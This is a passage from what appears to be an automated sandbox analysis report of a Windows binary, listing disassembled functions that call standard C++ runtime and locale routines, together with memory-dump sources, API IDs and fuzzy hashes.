                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4E04F32645924FBCB222F54FC0DE9E7F2BEF08B51F052051F909661B1C7615E128BD2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00616DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00616E40
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00616F01
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00616F68
                                                                                                                                                                                                                                • Part of subcall function 00615BDC: HeapAlloc.KERNEL32(00000000,00000000,A8a,?,0061543A,?,00000000,?,00606CE7,00000000,A8a,00000000,?,?,?,0061363B), ref: 00615C0E
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00616F7D
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00616F8D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                                                                              • Opcode ID: 13f461e883dc1817b3316b68d244a3635a70c5f10e90a0f3c82b4b844f0e65a3
                                                                                                                                                                                                                              • Instruction ID: 529dbf441b81599079da5b703f59a4c6ae4e6c816e68fbd01b47d52b09a700b0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13f461e883dc1817b3316b68d244a3635a70c5f10e90a0f3c82b4b844f0e65a3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C351B076604216AFEB259FA5DC41EFB7AABEF04750F1D0228FD08D6250E731DC9187A4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EB8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005EB8DD
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005EB900
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005EB928
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005EB98D
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005EB9B7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 459529453-0
                                                                                                                                                                                                                              • Opcode ID: a9037c663acb048a7befd148ede92d2313a8326820c35db6c8516caf0b0a4af1
                                                                                                                                                                                                                              • Instruction ID: 29d73641220f91cb502d24205355f9cee7a94052062ca3c7a80d351f08416a06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9037c663acb048a7befd148ede92d2313a8326820c35db6c8516caf0b0a4af1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C31DF71900259DFDB14CF54D945BAEBBB5FB20320F144159E985A72E2D731AD01CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F1C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Maklocstr$Maklocchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2020259771-0
                                                                                                                                                                                                                              • Opcode ID: 065d7e788740da13e951a48364fb0638a8862ea9ab33a090c83b4cf8ad4c5d69
                                                                                                                                                                                                                              • Instruction ID: 80c9cbcf321d97fdd4d58ef07bb115501e4618aa3712d225bf334393a7293b2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 065d7e788740da13e951a48364fb0638a8862ea9ab33a090c83b4cf8ad4c5d69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C118FB1940B89BFE720DBA58885F22BFECBF44350F040919F7558B641D268FC5487A9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EEC87 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 317COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005EEC8E
                                                                                                                                                                                                                                • Part of subcall function 005ED87C: __EH_prolog3.LIBCMT ref: 005ED883
                                                                                                                                                                                                                                • Part of subcall function 005ED87C: std::_Lockit::_Lockit.LIBCPMT ref: 005ED88D
                                                                                                                                                                                                                                • Part of subcall function 005ED87C: std::_Lockit::~_Lockit.LIBCPMT ref: 005ED8FE
                                                                                                                                                                                                                              • _Find_elem.LIBCPMT ref: 005EEE8A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                              • String ID: 2`$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                              • API String ID: 2544715827-1506458768
                                                                                                                                                                                                                              • Opcode ID: d1d832410c7d13450f282ee01525db64c20c098e8b2a44299fa0807b9a164db3
                                                                                                                                                                                                                              • Instruction ID: 75d234030e5db30170b6991e9b07ecaf7357e31095da305492f03adeaa658332
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1d832410c7d13450f282ee01525db64c20c098e8b2a44299fa0807b9a164db3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03C1AF34E142C98ADF29DFA589466ECBFB6BF55300F284069E8D56B287CB309D46CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F62BE Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005F62C8
                                                                                                                                                                                                                                • Part of subcall function 005F2D74: __EH_prolog3.LIBCMT ref: 005F2D7B
                                                                                                                                                                                                                                • Part of subcall function 005F2D74: std::_Lockit::_Lockit.LIBCPMT ref: 005F2D85
                                                                                                                                                                                                                                • Part of subcall function 005F2D74: std::_Lockit::~_Lockit.LIBCPMT ref: 005F2DF6
                                                                                                                                                                                                                              • _Find_elem.LIBCPMT ref: 005F6502
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                              • String ID: 2`$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                              • API String ID: 2544715827-1506458768
                                                                                                                                                                                                                              • Opcode ID: c7c74ad9c220cc606f5111a9a809d191395acaf21ae360fa320aca8b1f575c7a
                                                                                                                                                                                                                              • Instruction ID: 0623fc2f9bcf9826b1ed19ceaa957bdd4526491ef91bfbdbfc51968ab6a590c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7c74ad9c220cc606f5111a9a809d191395acaf21ae360fa320aca8b1f575c7a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AC1A130E0426D8ADF25DF64C8897BDBFB2BF51304F444499DA89AB286DB389D85CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F6694 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 316COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005F669E
                                                                                                                                                                                                                                • Part of subcall function 005EB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 005EB8DD
                                                                                                                                                                                                                                • Part of subcall function 005EB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 005EB900
                                                                                                                                                                                                                                • Part of subcall function 005EB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 005EB928
                                                                                                                                                                                                                                • Part of subcall function 005EB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 005EB9B7
                                                                                                                                                                                                                              • _Find_elem.LIBCPMT ref: 005F68D8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                              • String ID: 2`$0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                              • API String ID: 3042121994-1506458768
                                                                                                                                                                                                                              • Opcode ID: 444b0c73a4b033719e051db36ecd3e3f7b77d6200ec91f178c48c07c5033986a
                                                                                                                                                                                                                              • Instruction ID: 8766f6cead3a5459829b61fac33d2f378ad93fe44e99ba500f73bad4ee478fe4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 444b0c73a4b033719e051db36ecd3e3f7b77d6200ec91f178c48c07c5033986a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82C1CE30E0426D8FDF259F64C9857BCBFB2BF50304F548499DA89AB286DB788D85CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EBB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000018,FAB1B776,?,00000000), ref: 005EBBA3
                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 005EBD7F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                                              • API String ID: 3924972193-2658103896
                                                                                                                                                                                                                              • Opcode ID: ba39629eb3fefa5ac4e29aa7e1919f6ef486cdb702329021783dcfc86ec68756
                                                                                                                                                                                                                              • Instruction ID: f09ebd7df4fd73a460c3a87f28817fbcfd50c7d26ed90fe69090eb08f51da6bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba39629eb3fefa5ac4e29aa7e1919f6ef486cdb702329021783dcfc86ec68756
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A461C1B1D00788DBDB10DFA5C945BDEBBF8FF14304F14825AE885AB281E775AA44CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FD4FA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005FD501
                                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 005FD573
                                                                                                                                                                                                                                • Part of subcall function 005F254E: __EH_prolog3.LIBCMT ref: 005F2555
                                                                                                                                                                                                                                • Part of subcall function 005F254E: std::_Lockit::_Lockit.LIBCPMT ref: 005F255F
                                                                                                                                                                                                                                • Part of subcall function 005F254E: std::_Lockit::~_Lockit.LIBCPMT ref: 005F25D0
                                                                                                                                                                                                                                • Part of subcall function 005F2FC8: __EH_prolog3.LIBCMT ref: 005F2FCF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                                                                              • String ID: 2`$%.0Lf
                                                                                                                                                                                                                              • API String ID: 3050236999-922654840
                                                                                                                                                                                                                              • Opcode ID: cb7bdb8857d0bacb25a400a3de0d620532c9eb11d9cbfc72290bd83ae1356228
                                                                                                                                                                                                                              • Instruction ID: 977071d2c57e18138d847bac89a2099a0c7e797c9f75f204dacba776a57fca1f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb7bdb8857d0bacb25a400a3de0d620532c9eb11d9cbfc72290bd83ae1356228
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED416B71D00219ABCF05EFE4C849AED7FB6FF48300F204449E946AB295DB399A15CF91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FD79E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 005FD7A5
                                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 005FD817
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::_Lockit.LIBCPMT ref: 005E8657
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::_Lockit.LIBCPMT ref: 005E8679
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::~_Lockit.LIBCPMT ref: 005E86A1
                                                                                                                                                                                                                                • Part of subcall function 005E8610: std::_Lockit::~_Lockit.LIBCPMT ref: 005E880E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                              • String ID: 2`$%.0Lf
                                                                                                                                                                                                                              • API String ID: 1487807907-922654840
                                                                                                                                                                                                                              • Opcode ID: db1e21b628db0660f831062445c8df53c70c2ca0b3fe69d803bc57541ba1ba79
                                                                                                                                                                                                                              • Instruction ID: 5fdf72f2faf809df38226967ddd1f0f0a6e66ad43431326ba241b0938982beba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db1e21b628db0660f831062445c8df53c70c2ca0b3fe69d803bc57541ba1ba79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA415A71D00219ABCF09EFE4D849AED7FB6FB48300F204459E945AB295EB35AA15CF90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00601887 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0060188E
                                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00601900
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::_Lockit.LIBCPMT ref: 005E92A0
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::_Lockit.LIBCPMT ref: 005E92C2
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::~_Lockit.LIBCPMT ref: 005E92EA
                                                                                                                                                                                                                                • Part of subcall function 005E9270: std::_Lockit::~_Lockit.LIBCPMT ref: 005E9422
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                              • String ID: 2`$%.0Lf
                                                                                                                                                                                                                              • API String ID: 1487807907-922654840
                                                                                                                                                                                                                              • Opcode ID: cad7e16deb88087490e7a17f928ff5b26dbc6b344717e8f2c3f5f4b8c934e5c0
                                                                                                                                                                                                                              • Instruction ID: a077752b9841e9d1919189b4245951c35f9a46163f72f5cf9e53752719c6c385
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cad7e16deb88087490e7a17f928ff5b26dbc6b344717e8f2c3f5f4b8c934e5c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15415971E00209ABCF09DFD4D855ADE7BB6FB48300F208449E856AB295DB759A16CF90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F8386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F838D
                                                                                                                                                                                                                                • Part of subcall function 005F1C42: _Maklocstr.LIBCPMT ref: 005F1C62
                                                                                                                                                                                                                                • Part of subcall function 005F1C42: _Maklocstr.LIBCPMT ref: 005F1C7F
                                                                                                                                                                                                                                • Part of subcall function 005F1C42: _Maklocstr.LIBCPMT ref: 005F1C9C
                                                                                                                                                                                                                                • Part of subcall function 005F1C42: _Maklocchr.LIBCPMT ref: 005F1CAE
                                                                                                                                                                                                                                • Part of subcall function 005F1C42: _Maklocchr.LIBCPMT ref: 005F1CC1
                                                                                                                                                                                                                              • _Mpunct.LIBCPMT ref: 005F841A
                                                                                                                                                                                                                              • _Mpunct.LIBCPMT ref: 005F8434
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                              • String ID: $+xv
                                                                                                                                                                                                                              • API String ID: 2939335142-1686923651
                                                                                                                                                                                                                              • Opcode ID: 46300d0a2339fc23a9790fd5f4721813f84c9f390ee9c811c6d48ba7d332a45a
                                                                                                                                                                                                                              • Instruction ID: fbb6bf8ff6b8bd5202250b4c850fc4011ec035002eaca4b787bf9147b31b101b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46300d0a2339fc23a9790fd5f4721813f84c9f390ee9c811c6d48ba7d332a45a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A421C4B1804B96AEDB25DF75C88477BBEF8BB08300F04095EE199C7A42D734E601CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FFFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Mpunct$H_prolog3
                                                                                                                                                                                                                              • String ID: $+xv
                                                                                                                                                                                                                              • API String ID: 4281374311-1686923651
                                                                                                                                                                                                                              • Opcode ID: 11389f26f6a17be0c17eafb9ed36041acbfac7593d573ce89b5de88d44c31433
                                                                                                                                                                                                                              • Instruction ID: 565b57b0f2970795998afc2f213821072f15540c3b805454179aab1e282c896d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11389f26f6a17be0c17eafb9ed36041acbfac7593d573ce89b5de88d44c31433
